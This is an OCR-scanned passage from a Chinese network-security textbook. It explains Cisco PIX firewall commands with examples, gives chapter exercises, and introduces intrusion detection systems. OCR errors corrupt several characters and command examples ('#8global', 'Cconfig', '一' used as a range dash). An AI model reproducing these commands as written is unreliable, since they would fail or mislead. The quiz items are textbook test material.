主机 可 以 对 外 访问 ;[netmark] 表 示 内 网 IP 地 址 的 子 网 掩 码 。 

例 1:Pix525(config)#nat (inside) 10 0 

表示 启用 nat, 内 网 的 所 有 主机 都 可 以 访问 外 网 ,用 0 可 以 代表 0. 0.0.0。 

例 2:Pix525(config) # nat (inside) 1 192. 168. 1.0 255. 255. 255. 0 

表示 只 有 192. 168. 1. 0 这 个 网 段 内 的 主机 可 以 访问 外 网 。 


5. 指定 外 部 地 址 范围 (global) 
global 命令 把 内 网 的 IP 地 址 翻译 成 外 网 的 IP 地 址 或 一 段 地 址 范围 。global 命令 的 配 
global (if_ name) nat_id ip_address-ip_address [netmark global_mask] 


其 中 (if_name) 表 示 外 网 接口 名 字 ,例如 (outside) ;nat_id 用 来 标识 全 局 地 址 池 ,使 它 与 
其 相应 的 nat 命令 相 匹 配 ;ip_address-ip_address 表示 翻译 后 的 单个 IP 地 址 或 一 段 IP 地 址 
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范围 ;[netmark global_mask] 表 示 全 局 IP 地 址 的 子 网 掩 码 。 

例 3:Pix525(config)# global (outside) 1 61. 144. 51. 42 一 61. 144. 51. 48 

表示 内 网 的 主机 通过 Pix 防火 墙 要 访问 外 网 时 ,Pix 防火墙 将 使 用 61. 144. 51. 42 一 
61. 144. 51. 48 这 段 IP 地 址 池 为 要 访问 外 网 的 主机 分 配 一 个 全 局 IP 地 址 。 

例 4:Pix525(config) #8global (outside) 1 61. 144. 51. 42 

表示 内 网 要 访问 外 网 时 ,Pix 防火 墙 将 为 访问 外 网 的 所 有 主机 统一 使 用 61. 144. 51. 42 
这 个 单一 IP 地 址 。 

例 5:Pix525(config)#no global (outside) 1 61. 144. 51. 42 

表示 删除 这 个 全 局 表 项 。 


6. 设置 静态 路 由 (route) 


route 命令 定义 一 条 静态 路 由 。 
route 命令 配置 语法 : 


route if_name ip_address netmask gateway_ip [metric] 


其 中 if_name 表示 接口 名 字 , 例 如 inside、outside;ip_address 和 netmask 为 日 标 IP 地 
址 及 其 子 网 拖 码 ;gateway_ip 表示 网 关 路 由 器 的 IP 地 址 ;[metric] 表 示 到 gateway_ip 的 跳 
数 , 通 常 默认 是 1。 

例 6:Pix525(config)#route outside 0 0 61. 144. 51. 168 1 

表示 一 条 指向 边界 路 由 器 (IP 地 址 为 61. 144. 51. 168) 的 默认 路 由 。 

例 7:Pix525(config) # route inside 10. 1.1.0 255.255. 255.0 172. 16.0.1 1 

Pix525(config) # route inside 10. 2.0.0 255. 255.0.0 172. 16.0.11 

如 果 内 部 网 络 只 有 一 个 网 段 ,按照 例 6 那样 设置 一 条 缺 省 路 由 即 可 ;如 果 内 部 存在 多 个 
网 络 ,需要 配置 一 条 以 上 的 静态 路 由 。 例 7 中 的 上 面 那 条 命令 表示 创建 了 一 条 到 网 络 
10. 1.1.0 的 静态 路 由 ,静态 路 由 的 下 一 跳 路 由 器 IP 地 址 是 172. 16. 0. 1 。 


7. 配置 静态 IP 地 址 翻译 (static) 


如 果 从 外 网 发 起 一 个 会 话 , 会 话 的 目的 地 址 是 一 个 内 网 的 IP 地 址 ,static 命令 就 把 内 网 
地 址 翻译 成 一 个 指定 的 外 网 地 址 ,允许 这 个 会 话 建立 。static 命令 配置 语法 : 


static (internal_if_name, external_if_name) outside_ip_address inside_ip_address 


其 中 internal_if_name 表示 内 网 接口 名 ,安全 级 别 较 高 .如 inside;external_if_name 为 
外 网 接口 名 ,安全 级 别 较 低 。 如 outside;outside_ip_address 为 正在 访问 的 较 低 安全 级 别 的 
接口 上 的 IP 地 址 ;inside_ip_address 为 内 部 网 络 的 本 地 IP 地 址 。 

例 8:Pix525(config) # static (inside.outside) 61. 144. 51. 62 192. 168.0.8 

表示 内 网 IP 地 址 为 192. 168. 0. 8 的 主机 ,对 于 通过 Pix 防火 墙 建立 的 每 个 会 话 ,都 被 
翻译 成 61. 144. 51. 62 这 个 外 网 地 址 ,也 可 以 理解 成 static 命令 创建 了 内 网 IP 地 址 
192.168. 0. 8 和 外 网 IP 地 址 61. 144. 51. 62 之 间 的 静态 映射 。 

例 9:Pix525(config) # static (inside,outside) 192. 168. 0. 2 10. 0. 1. 3 

例 10 :Pix525(Cconfig) # static (dmz,outside) 211. 48. 16. 2 172. 16. 10. 8 

215 


网 络 安全 技术 项 目 化 教程 


通过 以 上 几 个 例子 .说 明 使 用 static 命令 可 以 为 一 个 特定 的 内 网 IP 地 址 设置 一 个 永久 
的 外 网 IP 地 址 。 这 样 就 能 够 为 具有 较 低 安全 级 别 的 指定 接口 创建 一 个 人 口 ,使 它们 可 以 进 
入 到 具有 较 高 安全 级 别 的 指定 接口 。 


8. 管道 命令 (conduit) 


使 用 static 命令 可 以 在 一 个 内 网 IP 地 址 和 一 个 外 网 IP 地 址 之 间 创 建 一 个 静态 映射 ， 
但 从 外 部 到 内 部 接口 的 连接 仍然 会 被 Pix 防火 墙 的 自 适应 安全 算法 (asa) 阻 挡 ,conduit 命 
令 用 来 允许 数据 流 从 具有 较 低 安全 级 别 的 接口 流向 具有 较 高 安全 级 别 的 接口 ,例如 允许 从 
外 部 到 dmz 或 内 部 网 络 的 会 话 。 对 于 从 外 部 到 内 部 接口 的 连接 ,static 和 conduit 命令 将 一 
起 使 用 ,来 指定 会 话 的 建立 。conduit 命令 配置 语法 : 

conduit permit| deny protocol global_ip port[ - port] foreign_ip [netmask] 

其 中 permit 表示 人 允许 访问 ,deny 表示 拒绝 访问 ;protocol 指 的 是 连接 协议 ,比如 TCP、 
UDP ICMP 等 ;global_ip 指 的 是 先前 由 global 或 static 命令 定义 的 全 局 IP 地 址 ,如 果 
global_ip 为 0, 就 用 any 代替 0, 如 果 global_ip 是 一 台 主 机 ,就 用 host 命令 参数 ;port 指 的 
是 服务 所 作用 的 端口 .例如 WWW 使 用 80,SMTP 使 用 25 等 ,可 以 通过 服务 名 称 或 端口 数 
字 来 指定 端口 :foreign_ip 表示 可 访问 global_ip 的 外 网 IP 地 址 ,对 于 任意 主机 ,可 以 用 any 
表示 ,如 果 foreign_ip 是 一 台 主 机 ,就 用 host 命令 参数 。 

例 11:Pix525(config)# conduit permit TCP host 133.0.0.1 eq WWW any 

表示 允许 任何 外 部 主机 对 全 局 地 址 为 133. 0. 0. 1 的 主机 进行 http 访问 。 其 中 使 用 eq 
和 一 个 端口 来 允许 或 拒绝 对 这 个 端口 的 访问 。eq FTP 就 是 指 允 许 或 拒绝 只 对 FTP 的 
访问 。 

例 12:Pix525(config) # conduit deny TCP any eq ftp host 61. 144. 51. 89 

表示 不 允许 外 部 主机 61. 144. 51. 89 对 任何 全 局 地 址 进行 FTP 访问 。 

例 13:Pix525(config) # conduit permit ICMP any any 

表示 允许 ICMP 消息 向 内 部 和 外 部 通过 。 

例 14:Pix525(config) # static (inside,outside) 61. 144. 51. 62 192. 168. 0. 3 

Pix525(config) # conduit permit TCP host 61. 144. 51. 62 eq WWW any 

这 个 例子 说 明 static 和 conduit 的 关系 。192. 168. 0. 3 在 内 网 是 一 台 Web 服务 器 ,现在 
希望 外 网 的 用 户 能 够 通过 Pix 防火 墙 得 到 Web 服务 ,所 以 先 做 static 静态 映射 :192. 168 
.0. 3 一 61. 144. 51. 62( 全 局 地 址 ), 然 后 利用 conduit 命令 允许 任何 外 部 主机 对 全 局 地 址 
61. 144. 51. 62 进行 http 访问 。 


9. 侦 昕 命令 (fixup) 


fixup 命令 的 作用 是 启用 、 禁 止 改变 一 个 服务 或 协议 通过 Pix 防火 墙 ,由 fixup 命令 指 
定 的 端口 是 Pix 防火 墙 要 侦 听 服务 的 端口 。 

例 15:Pix525(config) #fixup protocol FTP 21 

表示 启用 FTP 协议 ,并 指定 FTP 的 端口 号 为 21。 
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10. 访问 控制 列表 命令 (access-list) 


访问 控制 列表 是 指令 列表 ,这 些 指令 列表 用 来 告诉 路 由 器 哪些 数据 包 可 以 接收 、 哪 些 数 
据 包 需要 拒绝 。access-list 命令 有 permit 和 deny 两 个 功能 ,网 络 协议 一 般 有 IP、TCP、 
UDP ICMP 等 。 
例 16:Pix525(config) # access-list 100 permit ip any host 222. 20. 16. 254 eq www 
Pix525(config) # access-list 100 deny ip any any 
Pix525(config) # access-group 100 in interface outside 


表示 只 允许 访问 主机 222. 20. 16. 254 的 WWW 服务 。 
11. 设置 telnet 


在 默认 情况 下 ,Pix 的 以 太 端 口 是 不 允许 用 telnet 访问 的 ,这 一 点 与 路 由 器 有 区 别 。 通 
过 inside 端口 能 用 telnet 访问 到 PIX 防火 墙 就 可 以 了 ,如 要 从 outside 端口 用 telnet 访问 到 
PIX 防火 墙 ,还 要 进行 一 些 安全 配置 。 

telnet 配置 语法 :telnet local_ip [netmask] 

其 中 local_ip 表示 被 授权 通过 telnet 访问 到 Pix 的 IP 地 址 。 如 果 不 设 此 项 ,Pix 的 配 
置 只 能 从 console 端口 进行 。 


12. 显示 与 保存 结果 


显示 结果 命令 为 show config。 
保存 结果 命令 为 write memory。 


76 习 题 
一 、 选 择 题 
1. 为 保障 网 络 安全 ,防止 外 部 网 对 内 部 网 的 侵犯 ,多 在 内 部 网 络 与 外 部 网 络 之 间 
设置 。 
A. 密码 认证 B. 入 侵 检 测 C. 数字 签名 D. 防火 墙 
2. 以 下 不 是 实现 防火 墙 的 主流 技术 。 
A. 包 过 滤 技 术 ”B. 状态 检测 技术 C. 代理 服务 器 技术 D. NAT 技术 
3. 关于 防火 墙 的 功能 ,以 下 是 错误 的 。 


A. 防火 墙 可 以 检查 进出 内 部 网 的 通信 和 量 
B. 防火 墙 可 以 使 用 应 用 网 关 技 术 在 应 用 层 上 建立 协议 过 滤 和 转发 功能 
C. 防火 墙 可 以 使 用 过 滤 技 术 在 网 络 层 对 数据 包 进 行 选 择 
D. 防火 墙 可 以 阻止 来 自 内 部 的 威胁 和 攻击 
4. 关于 防火 墙 ,以 下 是 错误 的 。 
A. 防火 墙 能 隐藏 内 部 IP 地 址 
B. 防火 墙 能 控制 进出 内 网 的 信息 流向 和 信息 包 
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C. 防火 墙 能 提供 VPN 功能 
D. 防火 墙 能 阻止 来 自 内 部 的 威胁 
5. 关于 防火 墙 技术 的 描述 中 ,正确 的 是 
A. 防火 墙 不 能 支持 网 络 地 址 转换 
B. 防火 墙 可 以 布置 在 企业 内 部 网 和 Internet 之 间 
C. 防火 墙 可 以 查 、 杀 各 种 病毒 
D. 防火 墙 可 以 过 滤 各 种 垃圾 文件 
6. 在 防火 墙 的 “访问 控制 "应 用 中 ,内 网 、 外 网 .DMZ 区 三 者 的 访问 关系 为 


(多 选 题 ) 

A. 内 网 可 以 访问 外 网 B. 内 网 可 以 访问 DMZ 区 

C. DMZ 区 可 以 访问 内 网 D. 外 网 可 以 访问 DMZ 区 
7. 防火 墙 是 指 三 

A. 一 种 特定 软件 B. 一 种 特定 硬件 


C. 执行 访问 控制 策略 的 一 组 系统 D. 一 批 硬件 的 总 称 
8. 包 过 滤 防 火 墙 一 般 不 需要 检查 的 部 分 是 


A. 源 IP 地 址 和 目的 IP 地址 B. 源 端口 和 日 的 端口 
C. 协议 类 型 D. TCP 序列 号 
9. 代理 服务 作为 防火 墙 技术 主要 在 OSI 的 实现 。 
A. 网 络 层 B. 表示 层 C. 应 用 层 D. 数据 链 路 层 


10. 关于 屏蔽 子 网 防火 墙 体系 结构 中 堡垒 主机 的 说 法 ,错误 的 是 
A. 不 属于 整个 防御 体系 的 核心 B. 位 于 DMZ 区 
C. 可 被 认为 是 应 用 层 网 关 D. 可 以 运行 各 种 代理 程序 
二 、 填空 题 
1. 包 过 滤 防 火 墙 依据 规则 对 收 到 的 IP 包 进 行 处 理 ,决定 是 还 是 丢弃 。 
2. 包 过 滤 防 火 墙 根据 分 组 包头 中 的 i 等 标志 ， 
确定 是 否 允 许 数据 包 通过 。 
3. 一 个 完整 的 代理 设备 包含 一 个 端 和 一 个 端 。 
4. 在 状态 检测 防火 墙 的 核心 部 分 建立 表 . 并 将 进出 网 络 的 数据 当成 一 个 个 的 
会 话 , 利 用 该 表 跟 踪 每 一 个 会 话 状态 。 
5. 在 屏蔽 子 网 防火 墙 体系 结构 中 ,Web 服务 器 应 放 在 位 置 。 
三 、 简 答题 


1. 防火 墙 的 主要 功能 是 什么 ? 

2. 包 过 滤 防 火 墙 的 优 缺 点 是 什么 ? 

3. 比较 防火 墙 与 路 由 器 的 区 别 。 

4. 防火 墙 不 能 防范 什么 ? 

5. Windows 防火 墙 与 天 网 防火 墙 的 主要 区 别 是 什么 ? 

四 、 操 作 练 习题 

设计 一 条 防火 墙 安全 规则 ,防范 别人 使 用 Telnet(TCP 端口 号 为 23) 登录 自己 的 计 
算 机 。 
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81 项 目 提 出 


张 先生 开办 的 公司 发 展 势头 良好 ,网 站 的 点 击 数 也 逐日 增加 。 由 此 , 张 先生 更 加 愿意 投 
入 资金 ,添置 了 防火 墙 、 杀 毒 软件 等 来 保护 自己 的 网 站 。 尽 管 如 此 ,他 的 网 站 还 是 会 不 时 遭 
到 莫名 的 攻击 。 

新 来 的 网 络 管理 员 小 李 了 解 了 该 网 站 的 大 概 情况 后 ,他 向 张 先生 建议 ,只 配备 防火 墙 和 
杀毒 软件 还 不 够 ,还 需要 一 个 强大 的 技术 来 保证 网 络 的 安全 . 那 就 是 入 侵 检测 技术 。 

在 采纳 了 小 李 的 建议 后 ,网 站 的 安全 状况 有 了 明显 的 好 转 。 


82 项 目 分 析 


防火 墙 尽管 具有 强大 的 抵御 外 部 攻击 的 功能 ,能 保护 系统 不 受 未 经 授权 访问 的 侵扰 ,但 
却 无 法 阻止 来 自 内 部 人 员 的 攻击 。 在 网 络 安全 管理 中 ,除了 消极 被 动 地 阻止 攻击 行为 外 ,还 
应 该 主动 出 击 去 检测 那些 正在 实施 的 攻击 行为 ,进一步 预防 安全 隐患 的 发 生 。 

传统 的 防火 墙 在 工作 时 ,就 像 深 宅 大 院 虽 有 高 大 的 院 墙 , 却 不 能 挡住 小 老鼠 甚至 是 家 贼 
的 偷袭 一 样 ,因为 人 侵 者 可 以 找到 防火 墙 背后 可 能 敞开 的 后 门 。 另 外 ,防火 墙 完全 不 能 阻止 
来 自 网 络 内 部 的 攻击 .通过 调查 发 现 .65% 左 右 的 攻击 来 自 网 络 内 部 ,对 于 企业 内 部 心怀 不 
满 的 员工 ,防火 墙 形同虚设 。 还 有 ,由 于 性 能 的 限制 ,防火墙 不 能 提供 实时 的 入侵 检 测 能 力 ， 
而 这 一 点 ,对 于 现在 层出不穷 的 攻击 技术 来 说 是 至 关 重 要 的 。 最 后 ,防火墙 对 于 病毒 也 束 手 
无 策 。 因 此 ,以 为 在 Internet 和 人口 处 部 署 防火 墙 系统 就 足够 安全 的 想法 是 不 切实 际 的 。 根 
据 这 一 问题 ,人 们 设计 出 了 入 侵 检 测 系统 (IDS) .IDS 可 以 弥补 防火 墙 的 不 足 ,为 网 络 安全 提 
供 实时 的 人 侵 检测 及 采取 相应 的 防护 手段 .例如 ,记录 证 据 用 于 跟踪 、 恢 复 . 断 开 网 络 连 
接 等 。 

如 果 说 防火 墙 是 一 幢 大 楼 的 门卫 ,那么 人 侵 检 测 和 防御 就 是 这 幢 大 楼 里 的 监视 系 
统 。 一 旦 有 入侵 大 楼 的 行为 .或 内 部 人 员 有 越界 行为 .实时 监视 系统 就 会 发 现 情况 并 发 
出 警报 。 
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83 相关 知识 点 


8.3.1 入 侵 检测 系统 概述 


入 侵 检 测 系 统 (Intrusion Detection System,IDS) 是 一 类 专门 面向 网 络 人 侵 的 安全 监 
测 系统 , 它 从 计算 机 网 络 系统 中 的 若干 关键 点 收集 信息 ,并 分 析 这 些 信息 ,查看 网 络 中 是 否 
有 违反 安全 策略 的 行为 和 遭 到 袭击 的 迹象 。 入 侵 检 测 被 认为 是 防火 墙 之 后 的 第 二 道 安全 防 
线 , 在 不 影响 网 络 性 能 的 情况 下 能 对 网 络 进行 监测 ,从 而 提供 对 内 部 攻击 、 外 部 攻击 和 误 操 
作 的 实时 保护 。 

入 侵 检测 系统 的 基本 功能 有 以 下 几 个 方面 。 

(1) 检测 和 分 析 用 户 及 系统 的 活动 。 

(2) 审计 系统 配置 和 漏洞 。 

(3) 识别 已 知 攻击 。 

(4) 统计 分 析 异 常 行为 。 

(5) 评估 系统 关键 资源 和 数据 文件 的 完整 性 。 

(6) 对 操作 系统 的 审计 .追踪 ,管理 ,并 识别 用 户 违反 安全 策略 的 行为 。 

一 个 成 功 的 入 侵 检测 系统 ,不 但 可 使 系统 管理 员 时 刻 了 解 网 络 系统 (包括 程序 .文件 和 
硬件 设备 等 ) 的 任何 变更 ,还 能 给 网 络 安全 策略 的 制定 提供 指南 。 同 时 , 它 应 该 是 管理 和 配 
置 简单 ,使 非 专 业 人 员 也 能 容易 地 获得 网 络 安 全 。 当 然 , 入 侵 检测 的 规模 还 应 根据 网 络 威 
胁 、 系 统 构 造 和 安全 需求 的 改变 而 改变 。 入 侵 检测 系统 在 发 现 入 侵 后 ,应 及 时 作出 响应 , 包 
括 切 断 网 络 连 接 、 记 录 事 件 和 报警 等 。 

日 前 ,入 侵 检测 系统 主要 以 模式 匹配 技术 为 主 ,并 结合 异常 匹配 技术 。 从 实现 方式 上 一 
般 分 为 两 种 ;基于 主机 和 基于 网 络 ,而 一 个 完备 的 入 侵 检测 系统 则 一 定 是 基于 主机 和 基于 网 
络 这 两 种 方式 兼备 的 分 布 式 系 统 。 另 外 ,能 够 识别 的 入 侵 手 段 数量 的 多 少 、 最 新 入 侵 手 段 的 
更 新 是 否 及 时 也 是 评价 入 侵 检 测 系统 的 关键 指标 。 


8.3.2 入 侵 检测 系统 的 基本 结构 


为 了 解决 入 侵 检测 系统 之 间 的 兼容 性 和 互 操 作 性 ,国际 上 的 一 些 研究 组 织 开 展 了 研究 
入 侵 检测 系统 的 标准 化 工作 ,其 中 美国 国防 部 高 级 研究 计划 署 (DARPA) 提 出 的 建议 是 公 
共和 人 侵 检测 框架 (CIDF) 。CIDF 阐述 了 一 个 人 侵 检测 系统 的 通用 模型 , 它 将 一 个 人 侵 检测 
系统 分 为 以 下 4 个 基本 组 件 :事件 发 生 器 、 事 件 分 析 器 、 事 件数 据 库 和 响应 单元 。 入 侵 检测 
系统 的 组 成 如 图 8-1 所 示 。 

CIDF 将 IDS 需要 分 析 的 数据 统称 为 事件 . 它 可 以 是 网 络 中 的 数据 包 , 也 可 以 是 从 系统 
日 志 或 其 他 途径 得 到 的 信息 。 
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作出 响应 < 
图 8-1 入 侵 检测 系统 的 组 成 


(1) 事件 发 生 器 

中 负责 原始 数据 采集 ,并 将 收集 到 的 原始 数据 转换 为 事件 ,向 系统 的 其 他 部 分 提供 此 事件 。 

@ 收集 内 容 , 包 括 系统 、 网 络 数据 及 用 户 活动 的 状态 和 行为 。 

@ 需要 在 计算 机 网 络 系统 中 的 若干 不 同 的 关键 点 (不 同 网 段 和 不 同 主机 ) 收 集 信息 。 包 
括 系 统 和 网 络 的 日 志文 件 ;网 络 流量 ;系统 日 录 和 文件 的 异常 变化 ;程序 执行 的 异常 行为 等 。 

入 侵 检 测 系统 很 大 程度 上 依赖 于 收集 信息 的 可 靠 性 和 正确 性 ,要 保证 用 来 检测 网 络 系统 的 
软件 的 完整 性 ,特别 是 入 侵 检测 系统 软件 本 身 应 具有 坚固 性 ,防止 被 算 改 而 收集 到 错误 的 信息 。 

(2) 事件 分 析 器 

接收 事件 信息 ,并 对 其 进行 分 析 ,判断 是 否 为 入 侵 行为 或 异常 现象 ,最 后 将 判断 的 结 
转变 为 告警 信息 。 分 析 方 法 主要 有 以 下 3 种 。 

O@ 模式 匹配 。 将 收集 到 的 信息 与 已 知 的 网 络 入 侵 和 系统 误 用 模式 数据 库 进 行 比较 ,从 
而 发 现 违背 安全 策略 的 行为 。 

@ 统计 分 析 。 首 先 给 系统 对 象 (如 用 户 .文件 .日 录 \ 设 备 等 ) 创 建 一 个 统计 描述 ,统计 正常 使 
用 时 的 一 些 测量 属性 (如 访问 次 数 、 操 作 失 败 次 数 和 延 时 等 ); 测 量 属性 的 平均 值 和 偏差 将 被 用 来 
与 网 络 ,系统 的 行为 进行 比较 ,任何 测量 属性 值 在 正常 值 范围 之 外 时 ,就 认为 有 和 人 侵 发 生 。 

@ 完整 性 分 析 ( 往 往 用 于 事后 分 析 ) 。 主 要 检测 某 个 文件 或 对 象 是 否 被 更 改 。 

(3) 事件 数据 库 

存放 各 种 中 间 和 最 终 数 据 的 地 方 , 它 可 以 是 复杂 的 数据 库 , 也 可 以 是 简单 的 文本 文件 。 
从 事件 发 生 器 或 事件 分 析 器 接收 数据 ,一 般 会 将 数据 进行 较 长 时 间 的 保存 。 

(4) 响应 单元 

根据 告警 信息 做 出 反应 ,是 IDS 中 的 主动 武器 ,可 做 出 强烈 反应 ,如 切断 连接 、 改 变 文 
件 属性 等 ,也 可 以 只 做 出 简单 的 报警 。 

以 上 4 个 组 件 只 是 逻辑 实体 ,一 个 组 件 可 能 是 某 台 计算 机 上 的 一 个 进程 甚至 线程 ,也 可 
能 是 多 个 计算 机 上 的 多 个 进程 ,它们 以 GIDO( 统 一 入 侵 检 测 对 象 ) 格 式 进行 数据 交换 。 


8.3.3 入 侵 检测 系统 的 分 类 


1. 根据 分 析 方法 和 检测 原理 分 类 


e@ 基于 异常 的 人 侵 检测 。 首 先 总 结 出 正常 操作 应 该 具有 的 特征 (用 户 轮廓 ) , 当 用 户 活 
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动 与 正常 行为 有 重大 偏离 时 即 被 认为 是 入 侵 。 
® 基于 误 用 的 和 人 侵 检 测 。 收 集 非 正常 操作 时 的 行为 特征 ,建立 相关 的 特征 库 , 当 被 监 
测 的 用 户 或 系统 行为 与 库 中 的 记录 相 匹 配 时 ,系统 就 认为 这 种 行为 是 入 侵 。 


2. 根据 数据 来 源 分 类 


e 基于 主机 的 人 侵 检测 系统 (HIDS)。 系 统 获 取 数 据 的 依据 是 系统 运行 所 在 的 主机 ， 
保护 的 目标 也 是 系统 运行 所 在 的 主机 。 

® 基于 网 络 的 人 侵 检 测 系统 (NIDS)。 系 统 获取 数据 的 依据 是 网 络 传输 的 数据 包 ,保护 
的 是 网 络 的 正常 运行 。 

® 分 布 式 人 侵 检测 系统 (混合 型 )。 将 基于 网 络 和 基于 主机 的 和 人 侵 检 测 系统 有 机 地 结 
合 在 一 起 。 


3. 根据 体系 结构 分 类 


e 集中 式 。 集 中 式 结构 的 IDS 可 能 有 多 个 分 布 于 不 同 主机 上 的 审计 程序 ,但 只 有 一 个 
中 央 入 侵 检测 服务 器 。 审 计 程 序 把 当地 收集 到 的 数据 踪迹 发 送 给 中 央 服 务 器 进行 分 析 处 
理 。 随 着 网 络 规模 的 增加 ,主机 审计 程序 和 服务 器 之 间 传 送 的 数据 就 会 剧 增 ,导致 网 络 性 能 
大 大 降低 。 并 且 一 旦 中 央 服 务 器 出 现 问 题 , 整 个 系统 就 会 陷入 瘫痪 。 

® 分 布 式 。 分 布 式 结构 的 IDS 就 是 将 中 央 检 测 服务 器 的 任务 分 配给 多 个 基于 主机 的 
IDS。 这 些 IDS 不 分 等 级 ,各 司 其 职 , 负 责 监 控 当 地 主机 的 某 些 活 动 。 所 以 ,其 可 伸缩 性 、 
安全 性 都 得 到 提高 ,但 维护 成 本 也 高 了 很 多 .并 且 增 加 了 所 监控 主机 的 工作 负荷 。 


4. 根据 工作 方式 分 类 


e 离线 检测 。 离 线 检测 又 称 脱 机 分 析 检 测 系统 ,就 是 在 行为 发 生 后 ,对 产生 的 数据 进 
行 分 析 ,而 不 是 在 行为 发 生 的 同时 进行 分 析 , 从 而 检测 人 侵 活 动 , 它 是 非 实时 工作 的 系统 。 
如 对 日 志 的 审查 ,对 系统 文件 的 完整 性 检查 等 都 属于 这 种 。 一 般 而 言 , 脱 机 分 析 也 不 会 间隔 
很 长 时 间 , 所 谓 的 脱 机 只 是 与 联机 相对 而 言 的 。 

e@ 在 线 检测 。 又 称 为 联机 分 析 检 测 系统 ,就 是 在 数据 产生 或 者 发 生 改 变 的 同时 对 其 进 
行 检查 ,以 便 发 现 攻 击 行为 . 它 是 实时 联机 检测 系统 。 这 种 方式 一 般 用 于 网 络 数 据 的 实时 分 
析 , 有 时 也 用 于 实时 主机 审计 分 析 。 它 对 系统 资源 的 要 求 比较 高 。 


8.3.4 基于 网 络 和 基于 主机 的 入 侵 检测 系统 


1. 基于 网 络 的 入 侵 检 测 系 统 


基于 网 络 的 入侵 检测 系统 (NIDS) 放 置 在 比较 重要 的 网 段 内 ,不 停 地 监视 网 段 中 的 各 种 
数据 包 。 对 每 一 个 数据 包 进行 特征 分 析 。 如 果 数 据 包 与 系统 内 置 的 某 些 检测 规则 吻合 ,人 
侵 检测 系统 就 会 发 出 警报 甚至 直接 切断 网 络 连 接 。 日 前 ,大 部 分 入侵 检测 系统 是 基于 网 
络 的 。 

一 个 典型 的 NIDS 如 图 8-2 所 示 ,一 个 传感器 被 安装 在 防火 墙 外 以 探查 来 自 Internet 的 
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攻击 。 另 一 个 传感器 安装 在 网 络 内 部 以 探查 那些 已 穿 透 防火 墙 的 入 侵 以 及 内 部 网 络 人 侵 和 
威胁 。 


Internet 


图 8-2 ”基于 网 络 的 人 侵 检测 系统 


基于 网 络 的 人 侵 检测 系统 使 用 原始 网 络 数据 包 作为 数据 源 。NIDS 通常 利用 一 个 运行 
在 混杂 模式 下 的 网 络 适配器 来 实时 监视 并 分 析 通 过 网 络 的 所 有 数据 包 。 一 旦 检测 到 了 攻击 
行为 ,NIDS 的 响应 模块 就 提供 多 种 选项 以 通知 .报警 ,并 对 攻击 行为 采取 相应 的 措施 。 采 
取 的 措施 因 系 统 而 异 ,但 通常 都 包括 通知 管理 员 .中断 连接 并 且 为 分 析 和 证 据 收 集 而 作 的 会 
话 记录 。 

NIDS 已 经 广泛 成 为 安全 策略 的 实施 中 的 重要 组 件 , 它 有 许多 仅 靠 基于 主机 的 和 人 侵 检 
测 系统 无 法 提供 的 优点 。 

(1) 拥有 成 本 较 低 。 基 于 网 络 的 IDS 可 在 几 个 关键 访问 点 上 进行 策略 配置 ,以 观察 发 
往 多 个 系统 的 网 络 通信 。 所 以 它 不 要 求 在 许多 主机 上 装载 并 管理 软件 。 由 于 需 监 测 的 点 较 
少 ,因此 对 于 一 个 公司 的 环境 ,拥有 成 本 很 低 。 

(2) 检测 基于 主机 的 IDS 漏 掉 的 攻击 。 基 于 网 络 的 IDS 检查 所 有 数据 包 的 头 部 从 而 发 
现 恶意 的 和 可 疑 的 行为 迹象 。 基 于 主机 的 IDS 无 法 查看 数据 包 的 头 部 ,所 以 它 无 法 检测 到 
这 一 类 型 的 攻击 。 例 如 ,许多 来 自 IP 地 址 的 拒绝 服务 型 (DoS) 和 碎片 包 型 (Teardrop) 的 攻 
击 只 能 在 它们 经 过 网 络 时 ,检查 包 的 头 部 才能 被 发 现 。 这 种 类 型 的 攻击 都 可 以 在 基于 网 络 
的 IDS 中 通过 实时 监测 网 络 数据 包 流 而 被 发 现 。 

基于 网 络 的 IDS 可 以 检查 有 效 负 载 的 内 容 . 查 找 用 于 特定 攻击 的 指令 或 语法 。 例 如 ， 
通过 检查 数据 包 有 效 负载 可 以 查 到 黑客 软件 ,而 使 正在 寻找 系统 漏洞 的 攻击 者 毫 无 察觉 。 
由 于 基于 主机 的 IDS 不 检查 有 效 负 载 . 所 以 不 能 辨认 有 效 负 载 中 所 包含 的 攻击 信息 。 

(3) 攻击 者 不 易 转移 证 据 。 基 于 网 络 的 IDS 使 用 正在 发 生 的 网 络 通信 进行 实时 攻击 的 
检测 。 所 以 攻击 者 无 法 转移 证 据 。 被 捕获 的 数据 不 仅 包 括 攻击 的 方法 ,而 且 还 包括 可 识别 
的 黑客 身份 及 对 其 进行 起 诉 的 信息 。 许 多 黑客 都 熟知 审计 记录 .他 们 知道 如 何 操纵 这 些 文 
件 掩盖 他 们 的 人 侵 痕 迹 ,如 何 阻止 需要 这 些 信 息 的 基于 主机 的 IDS 去 检测 入 侵 。 

(4) 实时 检测 和 响应 。 基 于 网 络 的 IDS 可 以 在 恶意 及 可 疑 的 攻击 发 生 的 同时 将 其 检测 
出 来 ,并 做 出 更 快 的 通知 和 响应 。 例 如 ,一 个 基于 TCP 的 对 网 络 进 行 的 拒绝 服务 攻击 可 以 
通过 将 基于 网 络 的 IDS 发 出 TCP 复位 信号 .在 该 攻击 对 日 标 主机 造成 破坏 前 ,将 其 中 断 。 
而 基于 主机 的 系统 只 有 在 可 疑 的 登录 信息 被 记录 下 来 以 后 才能 识别 攻击 并 做 出 反应 。 而 这 时 关 
键 系统 可 能 早已 遭 到 了 破坏 .或 是 运行 基于 主机 的 IDS 的 系统 已 被 摧毁 。 实 时 IDS 可 根据 预定 
义 的 参数 做 出 快速 反应 ,这 些 反应 包括 将 攻击 设 为 监视 模式 以 收集 信息 ,立即 中 止 攻击 等 。 
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(5) 检测 未 成 功 的 攻击 和 不 良 意 图 。 基 于 网 络 的 IDS 增加 了 许多 有 价值 的 数据 ,以 判 
别 不 良 意图 。 即 便 防火 墙 可 以 正在 拒绝 这 些 尝 试 ,位 于 防火 墙 之 外 的 基于 网 络 的 IDS 可 以 
查 出 躲 在 防火 墙 后 的 攻击 意图 。 基 于 主机 的 IDS 无 法 查 到 从 未 攻击 到 防火 墙 内 主机 的 未 
遂 攻 击 ,而 这 些 丢 失 的 信息 对 于 评估 和 优化 安全 策略 是 至 关 重要 的 。 

(6) 操作 系统 无 关 性 。 基 于 网 络 的 IDS 作为 安全 监测 资源 ,与 主机 的 操作 系统 无 关 。 
与 之 相 比 ,基于 主机 的 IDS 必须 在 特定 的 .没有 遭 到 破坏 的 操作 系统 中 才能 正常 工作 ,生成 
有 用 的 结果 。 

